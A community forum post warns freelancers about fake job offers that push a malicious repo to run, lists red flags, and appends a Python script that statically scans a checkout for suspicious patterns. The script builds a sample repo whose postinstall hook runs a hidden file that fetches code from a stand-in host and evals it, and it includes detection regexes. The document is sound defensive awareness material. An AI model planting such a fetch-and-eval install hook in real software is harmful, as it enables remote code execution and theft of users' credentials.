Avoid Freelance Scams: Spot and Stop Job Offer Hacks
The network for creativity
Join 1.25M professional creatives like you
Connect with clients, get discovered, and run your business 100% commission-free
Creatives on Contra have earned over $150M and we are just getting started
Someone tried to hack me through a job offer on Contra. Here's how it works so you can see it coming.
Got a message last week from a "client" looking for a dev to build an AI tool. Solid-looking profile, real company linked, even the name and photo of a developer I actually recognized. I'm not going to name the person they were impersonating; they're well respected in the open-source world, and I'm certain the real person had nothing to do with this.
And that's part of what nearly got me. I happened to know the project this "person" supposedly works on, so for a moment I figured it could be the real deal. But the closer I looked, the less it held together. The location didn't match. What they claimed to be doing here on Contra didn't line up with what the real person actually does in real life. That was the immediate red flag.
Because the account only existed for one thing: to get me to download their project and run it on my machine. That's where the whole attack lives. Not in the message, in running the code.
Once I started actually looking, the warning signs were everywhere. A couple of these together and you should bail:
• The profile looks senior and polished, but the person you're actually talking to is vague and slippery, and the details don't add up.
• Won't give you a straight answer on budget, scope or timeline. Always pushes you to "just take a look at the project."
• The location and the story don't match the real person they're claiming to be.
• Drops a line about a previous dev who "failed" or "had an emergency," to make you feel like you have to move fast.
• The job description is all AI and machine-learning buzzwords, but the actual project is something plain and ordinary.
• The repo was created the same day they messaged you, with basically no history on it.
• The clincher: they want you to download it, run it, and send a screenshot of it working. Running it is the attack.
Here's what running it does. There's a bit of code hidden inside, in a file you'd have no reason to open. The setup instructions look completely clean, so nothing seems wrong. But as soon as the project is installed or started, that hidden code contacts a server the attacker controls, pulls down more code, and runs it on your computer. Then it goes for your passwords, your logins, your crypto, whatever it can grab. The screenshot looks normal on your end while all of that happens in the background. And because the part in the repo is only a downloader, a quick skim of the project tells you almost nothing about what the real payload does; that can change from one day to the next without the repo changing at all.
So if something like this shows up:
• Don't run it. Reading the code is fine; installing or starting it is not. That's the part that bites you.
• No real client needs you to run their existing code to prove anything. If that's the "test," it's not a test.
• If it feels off, it's off. Report the account and block it.
• And if they're wearing a real person's identity, give that person a heads-up. I did.
I reported this account to Contra and they've already banned it. The reporting works, so use it.
A job that drops out of nowhere, rushes you, and wants you running code you didn't write should always be a red flag.
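Reading the code is the safe option, and most of the tells described above can be checked by reading alone. The script below is an added example (not code from the original post, and not anything the impersonated project ships): it walks a checkout and flags an npm install-time hook, code sitting under a dotfile or dot-directory, a file that both reaches the network and dynamically executes what it gets back, and long opaque literals that usually mean a packed payload. It never installs or executes anything. The rule names, the regexes and the constructed sample repo it builds in a temp directory (the `config/.cache.js` file, the `example.invalid` host, the `QUFB...` blob) are all illustrative assumptions.

```python
"""Static triage of a repo you've been asked to run, without running it."""
from __future__ import annotations

import json
import os
import re
import sys
import tempfile
from dataclasses import dataclass
from pathlib import Path

CODE_EXT = {".js", ".mjs", ".cjs", ".ts", ".py", ".sh"}
SKIP_DIRS = {".git", "node_modules", "__pycache__"}
# npm runs these automatically during `npm install`, before anything "starts".
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare"}

# An outbound network call ...
NETWORK = re.compile(
    r"\b(fetch|XMLHttpRequest|https?\.(get|request)|axios|urllib|requests\.(get|post))\b")
# ... plus dynamic execution in the same file is the downloader pattern the post describes.
DYNAMIC_EXEC = re.compile(
    r"\b(eval|exec|execSync|spawn|runInThisContext|runInNewContext)\s*\(|\bnew\s+Function\s*\(")
# A long opaque literal in source usually means a packed or encoded payload.
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")


@dataclass
class Finding:
    rule: str
    path: str  # repo-relative, POSIX separators
    detail: str


def check_install_hooks(path: Path, rel: str) -> list[Finding]:
    """Flag package.json lifecycle scripts: they run at install time, unprompted."""
    try:
        scripts = json.loads(path.read_text()).get("scripts", {})
    except (ValueError, OSError):
        return []
    return [Finding("install_hook", rel, f"{hook}: {cmd}")
            for hook, cmd in scripts.items() if hook in LIFECYCLE_HOOKS]


def check_code_file(path: Path, rel: str) -> list[Finding]:
    out: list[Finding] = []
    # Code under a dotfile or dot-directory is "a file you'd have no reason to open".
    if any(part.startswith(".") for part in Path(rel).parts):
        out.append(Finding("hidden_code_file", rel, "code under a dotfile/dot-directory"))
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return out
    net, dyn = NETWORK.search(text), DYNAMIC_EXEC.search(text)
    if net and dyn:
        out.append(Finding("fetch_and_exec", rel, f"{net.group(0)!r} with {dyn.group(0)!r}"))
    blob = BASE64_BLOB.search(text)
    if blob:
        out.append(Finding("base64_blob", rel, f"{len(blob.group(0))}-char opaque literal"))
    return out


def scan_repo(root: str | os.PathLike) -> list[Finding]:
    """Walk the checkout and collect findings. Reads files only; executes nothing."""
    root = Path(root)
    findings: list[Finding] = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]  # don't descend into these
        for name in filenames:
            path = Path(dirpath) / name
            rel = path.relative_to(root).as_posix()
            if name == "package.json":
                findings += check_install_hooks(path, rel)
            if path.suffix in CODE_EXT:
                findings += check_code_file(path, rel)
    return findings


def build_sample_repo(root: Path) -> None:
    """Constructed lookalike of the repo in the post (inert: example.invalid never resolves)."""
    (root / "config").mkdir()
    (root / "src").mkdir()
    (root / "README.md").write_text("# ai-demo\n\nRun `npm install && npm start` and send a screenshot.\n")
    (root / "package.json").write_text(json.dumps({
        "name": "ai-demo", "version": "0.1.0",
        "scripts": {"start": "node index.js", "postinstall": "node config/.cache.js"},
    }))
    (root / "index.js").write_text('require("./config/.cache");\nconsole.log("AI demo ready");\n')
    (root / "src" / "model.py").write_text("def predict(x):\n    return x * 2\n")
    blob = "QUFB" * 60  # constructed stand-in for a packed second stage
    (root / "config" / ".cache.js").write_text("\n".join([
        'const https = require("https");',
        f'const k = "{blob}";',
        'https.get("https://example.invalid/u", (r) => {',
        '  let b = ""; r.on("data", (d) => (b += d)); r.on("end", () => eval(b));',
        "});",
    ]) + "\n")


def demo() -> list[Finding]:
    """Scan the constructed sample and return its findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_repo(Path(tmp))
        return scan_repo(tmp)


if __name__ == "__main__":
    results = scan_repo(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for f in results:
        print(f"[{f.rule}] {f.path}: {f.detail}")
    print("verdict:", "do not install or run" if results else "nothing obvious (still read it)")
```

Run it as `python triage.py path/to/checkout` on a fresh clone; with no argument it scans the built-in sample, which yields four findings, all on `package.json` and `config/.cache.js`. Treat any hit as "read that file before anything else", not as proof either way: a clean scan only means the downloader isn't in one of these shapes, and for the "repo created the same day" flag, `git log --reverse --format=%ci | head -1` prints the date of the first commit.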
Nagaraj (Snapzoom): Thanks for sharing. I've seen a couple of incidents like this on the Contra platform.
Toms: Thanks for sharing your experience, Berckan. Definitely need to be cautious and double-check before committing to a project.